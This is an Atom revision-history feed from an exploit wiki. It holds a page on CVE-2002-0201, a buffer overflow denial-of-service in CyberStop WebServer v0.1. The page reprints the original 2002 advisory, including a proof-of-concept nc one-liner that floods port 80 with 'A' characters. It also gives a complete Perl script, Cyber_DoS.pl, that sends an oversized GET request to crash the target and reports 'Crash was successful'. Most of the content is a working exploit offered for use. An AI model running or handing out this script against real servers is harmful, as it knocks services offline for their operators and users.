<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2002-0201_Cyber%E2%80%8B%E2%80%8Bstop_Web%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2002-0201 Cyber​​stop Web緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2002-0201_Cyber%E2%80%8B%E2%80%8Bstop_Web%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2002-0201_Cyber%E2%80%8B%E2%80%8Bstop_Web%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-26T09:48:54Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2002-0201_Cyber%E2%80%8B%E2%80%8Bstop_Web%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=797&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== &lt;pre&gt; ------oOo------ CyberStop WEbserver DoS Remote attacks. ------oOo------  CyberStop WEbserver for Windows 9x/NT/2000 contains remote vulnerabilities  which allow...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2002-0201_Cyber%E2%80%8B%E2%80%8Bstop_Web%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=797&amp;oldid=prev"/>
		<updated>2021-03-31T06:47:31Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== &amp;lt;pre&amp;gt; ------oOo------ CyberStop WEbserver DoS Remote attacks. ------oOo------  CyberStop WEbserver for Windows 9x/NT/2000 contains remote vulnerabilities  which allow...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
------oOo------&lt;br /&gt;
CyberStop WEbserver DoS Remote attacks.&lt;br /&gt;
------oOo------&lt;br /&gt;
&lt;br /&gt;
CyberStop WEbserver for Windows 9x/NT/2000 contains remote vulnerabilities &lt;br /&gt;
which allow users to attack remote services on the server. &lt;br /&gt;
Exploit information included.&lt;br /&gt;
&lt;br /&gt;
Company Affected: www.cyberstop.com.sg&lt;br /&gt;
Download: http://www.cyberstop.com.sg/webserver/webserver.zip&lt;br /&gt;
Version: v0.1&lt;br /&gt;
Date Added: 12-DIC-01&lt;br /&gt;
Size: 2.84 MB&lt;br /&gt;
OS Affected: Windows ALL.&lt;br /&gt;
&lt;br /&gt;
Author:&lt;br /&gt;
&lt;br /&gt;
** Alex Hernandez &amp;lt;al3xhernandez@ureach.com&amp;gt;&lt;br /&gt;
** Thanks all the people from Spain and Argentina.&lt;br /&gt;
** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins &lt;br /&gt;
** G.Maggiotti &amp;amp; H.Oliveira.&lt;br /&gt;
&lt;br /&gt;
----=[Brief Description]=------------&lt;br /&gt;
&lt;br /&gt;
Proof Of concept &lt;br /&gt;
&lt;br /&gt;
# uname -a&lt;br /&gt;
SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
# perl -e ' for ($i=1;$i&amp;lt;2049;$i++) { print &amp;quot;A&amp;quot;;} ' | nc 10.0.0.1 80&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
Exist a service named &amp;quot;Proyect1&amp;quot; and may be u can reading something &lt;br /&gt;
like this on Windows Server: &lt;br /&gt;
&lt;br /&gt;
&amp;quot;Run-time error 40006&amp;quot;:&lt;br /&gt;
Wrong protocol or connection state for the request transaction or &lt;br /&gt;
request.&lt;br /&gt;
&lt;br /&gt;
&amp;quot;Run-time error &amp;quot;5&amp;quot;:&lt;br /&gt;
Invalid procedure call or argument.&lt;br /&gt;
&lt;br /&gt;
Crash system and the admin need restart the service!.&lt;br /&gt;
&lt;br /&gt;
------oOo------------------------------------&lt;br /&gt;
Vendor Response:&lt;br /&gt;
The vendor was notified&lt;br /&gt;
help@cyberstopasia.com&lt;br /&gt;
http://www.cyberstop.com.sg&lt;br /&gt;
Patch Temporary: No Data of vendor.&lt;br /&gt;
&lt;br /&gt;
Alex Hernandez &amp;lt;al3xhernandez@ureach.com&amp;gt; (c) 2002.&lt;br /&gt;
&lt;br /&gt;
------oOo------------------------------------&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Cyber_Dos.pl==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/perl&lt;br /&gt;
# Simple script to send a long 'A^s' command to the server, &lt;br /&gt;
# resulting in the server crashing.&lt;br /&gt;
#&lt;br /&gt;
# CyberStop WEbserver v0.1 proof-of-concept exploit&lt;br /&gt;
# By Alex Hernandez &amp;lt;al3xhernandez@ureach.com&amp;gt; (C)2002.&lt;br /&gt;
#&lt;br /&gt;
# Thanks all the people from Spain and Argentina.&lt;br /&gt;
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, &lt;br /&gt;
# G.Maggiotti &amp;amp; H.Oliveira.&lt;br /&gt;
# &lt;br /&gt;
#&lt;br /&gt;
# Usage: perl -x Cyber_DoS.pl -s &amp;lt;server&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Example: &lt;br /&gt;
#&lt;br /&gt;
# perl -x Cyber_DoS.pl -s 10.0.0.1&lt;br /&gt;
# &lt;br /&gt;
# Crash was successful !&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
use Getopt::Std;&lt;br /&gt;
use IO::Socket;&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;\nCyberStop WEbserver v0.1 DoS exploit (c)2002.\n&amp;quot;);&lt;br /&gt;
print(&amp;quot;Alex Hernandez al3xhernandez\@ureach.com\n\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
getopts('s:', \%args);&lt;br /&gt;
if(!defined($args{s})){&amp;amp;usage;}&lt;br /&gt;
&lt;br /&gt;
($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);&lt;br /&gt;
&lt;br /&gt;
$def = &amp;quot;A&amp;quot;;&lt;br /&gt;
$num = &amp;quot;3000&amp;quot;;&lt;br /&gt;
$data .= $def x $num;&lt;br /&gt;
$serv = $args{s};&lt;br /&gt;
$port = 80;&lt;br /&gt;
$buf = &amp;quot;GET /$data /HTTP/1.0\r\n\r\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$in_addr = (gethostbyname($serv))[4] || die(&amp;quot;Error: $!\n&amp;quot;);&lt;br /&gt;
$paddr = sockaddr_in($port, $in_addr) || die (&amp;quot;Error: $!\n&amp;quot;);&lt;br /&gt;
$proto = getprotobyname('tcp') || die(&amp;quot;Error: $!\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
socket(S, PF_INET, SOCK_STREAM, $proto) || die(&amp;quot;Error: $!&amp;quot;);&lt;br /&gt;
connect(S, $paddr) ||die (&amp;quot;Error: $!&amp;quot;);&lt;br /&gt;
select(S); $| = 1; select(STDOUT);&lt;br /&gt;
print S &amp;quot;$buf&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;\nCrash was successful !\n\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
sub usage {die(&amp;quot;\n\nUsage: perl -x $0 -s &amp;lt;server&amp;gt;\n\n&amp;quot;);}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>